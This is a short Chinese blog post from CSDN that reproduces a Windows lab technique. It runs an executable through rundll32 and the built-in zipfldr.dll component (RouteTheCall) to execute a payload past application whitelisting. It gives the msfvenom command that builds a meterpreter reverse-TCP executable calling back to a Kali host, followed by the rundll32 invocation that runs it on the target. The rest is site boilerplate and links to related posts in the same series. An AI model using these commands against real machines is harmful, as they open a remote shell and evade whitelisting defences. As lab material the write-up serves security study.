对亮神基于白名单zipfldr.dll执行payload第十八季复现

最新推荐文章于 2024-05-23 08:30:00 发布
最新推荐文章于 2024-05-23 08:30:00 发布
阅读量298 收藏
点赞数
分类专栏: 亮神文章复现 文章标签: msf 白名单
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws13129/article/details/89892917
版权

0x00 zipfldr.dll简介:

zipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件。

0x01 环境

攻击机 kali 192.168.5.102
靶机 win7 192.168.5.101
装有av

0x02复现

攻击机
在这里插入图片描述
靶机rundll32.exe zipfldr.dll,RouteTheCall shellcode.exe
在这里插入图片描述
弹回
在这里插入图片描述

0x03 shellcode.exe

在这里插入图片描述

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.5.100 LPORT=10129 -f exe > shellcode.exe

0x04 总结

不过av

0x05 借鉴

https://micro8.github.io/Micro8-HTML/Chapter1/81-90/90_基于白名单zipfldr.dll执行payload第十八季.html

cxk331
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第八十八课:基于白名单Ftp.exe执行payload第十九.pdf
05-09
第八十八课:基于白名单Ftp.exe执行payload第十九.pdf
zipfldr.dll
12-27
zipfldr
渗透测试-基于白名单执行payload--zipfldr.dll
weixin_30765475的博客
05-03 107
0x01 zipfldr.dll简介: zipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件。 说明:zipfldr.dll所在路径已被系统添加PATH环境变量中,因此,zipfldr.dll命令可识别,但由于为dll文件,需调用rundll32.exe来执行。 Windows 2003 默认位置: C:\Windows\System32\zi...
.NET 一款团队内部免杀的WebShell
最新发布
ahhacker86的专栏
05-23 666
在.NET应用程序中,有时需要执行一些与系统相关的操作,例如调用Windows API函数来实现特定功能。本示例展示了如何在.NET页面中调用名为zipfldr.dll的动态链接库DLL中的RouteTheCall函数。
渗透测试-基于白名单执行payload--Pcalua
weixin_30662109的博客
05-03 533
0x01 Pcalua简介 Windows进程兼容性助理(Program Compatibility Assistant)的一个组件。 说明:Pcalua.exe所在路径已被系统添加PATH环境变量中,因此,Pcalua命令可识别 Windows 7 默认位置: C:\Windows\System32\pcalua.exe 0x02 复现 攻...
对亮基于白名单Regsvr32 执行 payload 第九复现
cxk
05-03 570
0x00 Regsvr32简介: Regsvr32命令用于注册COM组件,是 Windows 系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行。WinXP及以上系统的regsvr32.exe在windows\system32文件夹下;2000系统的regsvr32.exe在winnt\system32文件夹下。但搭配regsvr32.exe使用的 DLL,需要提供 DllRegis...
对亮基于白名单 PsExec 执行 payload 第十三复现
cxk
05-06 344
0x00 PsExec 简介: 微软于2006年7月收购sysinternals公司,PsExec是SysinternalsSuite的小工具之一,是一种轻量级的telnet替代品,允许在其他系统上执行进程,完成控制台应用程序的完全交互,而无需手动安装客户端软件,并且可以获得与控制台应用程序相当的完全交互性 0x01 环境 攻击机 kali 192.168.5.100 靶机 win7 192.1...
第九十课:基于白名单zipfldr.dll执行payload第十八.docx
09-15
基于白名单zipfldr.dll执行payload的攻击与防御技术 【基于白名单zipfldr.dll执行payload的攻击机理】 zipfldr.dll是Windows操作系统中自带的zip文件压缩/解压工具组件,自Windows XP开始就已经包含在系统中。由于...
第八十四课:基于白名单Forfiles执行payload第十四.docx
09-15
第八十四课:基于白名单Forfiles执行payload第十四.docx
对亮基于白名单 Compiler.Exe 执行 Payload 第六复现
cxk
05-03 503
0x00 Compiler.Exe简介 Microsoft.Workflow.Comiler.exe是.NET Framework默认自带的一个实用工具,用户能够以XOML工作流文件的形式提供一个序列化工作流来执行任意未签名的代码。 0x01 环境 攻击机kali 192.168.5.99 靶机win7 192.168.5.112 靶机装有数字AV 0x02 复现 A 攻击机配置监听 靶机执行 ...
对亮基于白名单 Cmstp.exe 执行 payload 第十六复现
cxk
05-06 266
待补充…
对亮基于白名单 Msbuild.exe 执行 payload 第一复现
cxk
05-01 709
0x00 MSBuild简介: MSBuild是 Microsoft Build Engine 的缩写,代表 Microsoft 和 Visual Studio 的新的生成平台。MSBuild 在如何处理和生成软件方面是完全透明的,使开发人员能够在未安装Visual Studio 的生成实验室环境中组织和生成产品。MSBuild 引入了一种新的基于 XML 的项目文件格式,这种格式容易理解、易于扩...
对亮基于白名单Wmic 执行 payload 第十复现
cxk
05-03 433
0x01 Wmic简介: WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之...
反注册zipfldr.dll禁用系统压缩文档zip
03-19 728
点击“开始→运行”,在运行输入框中输入“regsvr32 /u zipfldr.dll”(不包括引号,下同),回车即可。同样,如果不喜欢系统查看CAB压缩包,输入“regsvr32 /u cabview.dll”来取消对cabview.dll的注册。
启动应用程序出现zipfldr.dll找不到问题解决
wbcmbfy的博客
03-08 501
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个zipfldr.dll文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现zipfldr.dll丢失要怎么解决?
解决Windows系统目录zipfldr.dll文件丢失问题
amio555的专栏
09-19 107
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个zipfldr.dll文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现zipfldr.dll丢失要怎么解决?
渗透沉思录 - 转自亮
易编橙 · 终身成长社群,相遇已是上上签!
07-16 340
声明:本文内容来自亮-gitbook-渗透沉思录[还有一文,"渗透测试的本质"] 内容虽不多,但是通读之后受益良多,对自身的思考,学习层面及技术层面的思考,希望大家也能有所得吧。
hnu 暑期实训之回文串
qq_30747875的博客
09-15 257
文章目录题目思路AC代码 题目 思路 回文串首先可以对所给的字符串判断一下看看是不是回文串,如果是就直接输出0;对于不是回文串的,我们先来观察一段回文串 "abcba" 对于给出的串"abc"的话,我们可以先对其逆序得到"cba",然后将它的后i位接进去,就可以发现答案会是2.一定不能正序接入,因为得优先满足回文串的条件:首末位相等。 AC代码 #include <bits/stdc++.h> using namespace std; bool reverse_string(string
磁盘空间是足够的,没有存储空间不足
06-02
3. 如果你使用的是Windows自带的压缩工具,可以尝试打开命令提示符,输入"regsvr32 zipfldr.dll",回车后重启计算机,再进行压缩操作。 4. 如果以上方法都无效,可能需要卸载并重新安装压缩工具,或者升级到最新...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值